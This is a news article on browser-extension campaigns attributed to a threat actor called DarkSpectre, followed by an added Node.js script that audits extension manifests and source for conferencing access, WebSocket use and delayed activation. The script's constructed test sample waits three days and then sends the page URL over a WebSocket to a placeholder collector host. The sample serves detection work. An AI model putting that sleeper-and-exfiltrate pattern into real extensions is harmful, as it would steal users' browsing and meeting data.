A Chinese-linked threat actor is believed to be behind three major malicious browser extension campaigns that have compromised millions of users across Google Chrome, Microsoft Edge, and Mozilla Firefox.
Security researchers at Koi Security have linked the activity to a threat actor they track as ‘DarkSpectre,’ which they say has affected more than 8.8 million users over a span of seven years. The latest campaign, ‘The Zoom Stealer,’ alone impacted 2.2 million users through malicious extensions distributed across the three major browsers.
Earlier this month, Koi Security revealed the ShadyPanda campaign, whose extensions were built for data theft, search query hijacking, and affiliate fraud; it is estimated to have infected 5.6 million users. One Edge add-on, “New Tab – Customized Dashboard,” contained a logic bomb that held off its malicious behavior for three days, likely so the extension would still look benign during marketplace review. Nine extensions remain active, and researchers identified 85 dormant “sleeper” extensions that appeared benign for years before receiving malicious updates.
The second campaign, tracked as GhostPoster, primarily targeted Firefox users with fake utilities and VPN tools that injected malicious JavaScript to hijack affiliate links and conduct click and ad fraud. Investigators also uncovered related extensions on other platforms, including a Google Translate add-on for Opera with nearly one million installs.
The most recent campaign, known as ‘The Zoom Stealer,’ involves 18 extensions masquerading as productivity tools for enterprise video conferencing platforms. The add-ons harvested sensitive corporate intelligence, including meeting URLs with embedded passwords (a join link carrying its passcode is enough for an outsider to enter the call), meeting IDs, participant lists, and scheduling details, and transmitted the data in real time over WebSocket connections. Researchers found the extensions requesting access to more than 28 video conferencing services, including Zoom, Microsoft Teams, Google Meet, Cisco WebEx, and GoTo Webinar.
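The three traits described above (broad host access to conferencing services, real-time WebSocket exfiltration, and ShadyPanda's multi-day activation delay) all leave traces in an unpacked extension. The Node.js script below is an added example, not code from this article or from Koi Security's research: it audits an extension's manifest for match patterns covering conferencing domains and scans script source for WebSocket use and day-scale timing gates. The conferencing domain list, the sample manifest, and the sample background script are all constructed for illustration.

```javascript
// Added example (not from the article or from Koi Security): triage an
// unpacked browser extension for the indicators discussed above. Inputs are
// constructed samples; point the functions at a real manifest.json and its
// script files to use it on an actual extension directory.

// Conferencing domains a meeting-data stealer needs access to (assumed list).
const CONFERENCING_DOMAINS = [
  "zoom.us",
  "teams.microsoft.com",
  "meet.google.com",
  "webex.com",
  "gotowebinar.com",
];

// True when a Chrome/Firefox match pattern grants access to `domain` or any
// host under it. Handles <all_urls>, a bare "*" host and "*.example.com".
function patternCoversDomain(pattern, domain) {
  if (pattern === "<all_urls>") return true;
  const m = /^(?:\*|https?|wss?|ftp):\/\/([^/]+)\//.exec(pattern);
  if (!m) return false; // not a URL pattern (e.g. "storage", "tabs")
  const host = m[1].toLowerCase();
  if (host === "*") return true;
  if (host.startsWith("*.")) {
    const base = host.slice(2);
    return domain === base || domain.endsWith("." + base);
  }
  return host === domain || host.endsWith("." + domain);
}

// Every match pattern the extension declares: MV3 host_permissions, MV2
// permissions (which may carry URL patterns) and content_scripts matches.
function collectPatterns(manifest) {
  const patterns = new Set();
  for (const p of manifest.host_permissions || []) patterns.add(p);
  for (const p of manifest.permissions || []) patterns.add(p);
  for (const cs of manifest.content_scripts || []) {
    for (const p of cs.matches || []) patterns.add(p);
  }
  return [...patterns];
}

// Conferencing domains the extension can read, in CONFERENCING_DOMAINS order.
function conferencingCoverage(manifest) {
  const patterns = collectPatterns(manifest);
  return CONFERENCING_DOMAINS.filter((d) =>
    patterns.some((p) => patternCoversDomain(p, d))
  );
}

// Heuristic source scan. `delayedActivation` fires when the code reads the
// clock and compares against a constant of a day or more (in ms), or creates a
// chrome.alarms delay of at least 1440 minutes. Real samples need a human look.
function scanSource(src) {
  const websocket = /\bnew\s+WebSocket\s*\(|wss?:\/\//.test(src);
  const usesClock = /\bDate\.now\s*\(\)|\bnew\s+Date\s*\(/.test(src);
  const bigLiteral = (src.match(/\b\d{8,}\b/g) || []).some(
    (n) => Number(n) >= 86400000
  );
  const dayExpr =
    /24\s*\*\s*60\s*\*\s*60\s*\*\s*1000|1000\s*\*\s*60\s*\*\s*60\s*\*\s*24/.test(src);
  const alarm = /delayInMinutes\s*:\s*(\d+)/.exec(src);
  const longAlarm = alarm !== null && Number(alarm[1]) >= 1440;
  return {
    websocket,
    delayedActivation: (usesClock && (bigLiteral || dayExpr)) || longAlarm,
  };
}

// One report for an extension whose manifest and sources are in memory.
function triage(manifest, sources) {
  const domains = conferencingCoverage(manifest);
  const scans = sources.map(scanSource);
  const websocket = scans.some((s) => s.websocket);
  const delayedActivation = scans.some((s) => s.delayedActivation);
  const flags = [];
  if (domains.length >= 3) flags.push(`host access to ${domains.length} conferencing services`);
  if (websocket) flags.push("opens WebSocket connections");
  if (delayedActivation) flags.push("activation gated on a multi-day timer");
  return { domains, websocket, delayedActivation, flags };
}

// Constructed sample manifest resembling a "meeting helper" extension.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Meeting Notes Helper (constructed sample)",
  permissions: ["storage", "alarms"],
  host_permissions: ["*://*.zoom.us/*", "https://teams.microsoft.com/*", "*://meet.google.com/*"],
  content_scripts: [{ matches: ["*://*.webex.com/*"], js: ["content.js"] }],
};

// Constructed sample background script: sleeps three days, then exfiltrates.
const SAMPLE_SOURCE = `
chrome.storage.local.get("installedAt", ({ installedAt }) => {
  if (Date.now() - installedAt < 3 * 24 * 60 * 60 * 1000) return;
  const ws = new WebSocket("wss://collector.invalid/ingest");
  ws.onopen = () => ws.send(JSON.stringify({ url: location.href }));
});`;

console.log(JSON.stringify(triage(SAMPLE_MANIFEST, [SAMPLE_SOURCE]), null, 2));
```

The manifest check is the reliable half: an extension that declares host access to several unrelated conferencing services while advertising itself as a note taker deserves a second look regardless of what its code does today, since a later update can turn the access malicious, which is exactly how the dormant ShadyPanda extensions behaved. The source heuristics only surface candidates; obfuscated or remotely fetched code will slip past a regex.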
Koi Security has attributed the operations to China based on multiple indicators, including command-and-control (C&C) servers hosted on Alibaba Cloud, Chinese ICP registrations, Chinese-language code artifacts, and fraud schemes targeting Chinese e-commerce platforms such as JD.com and Taobao.
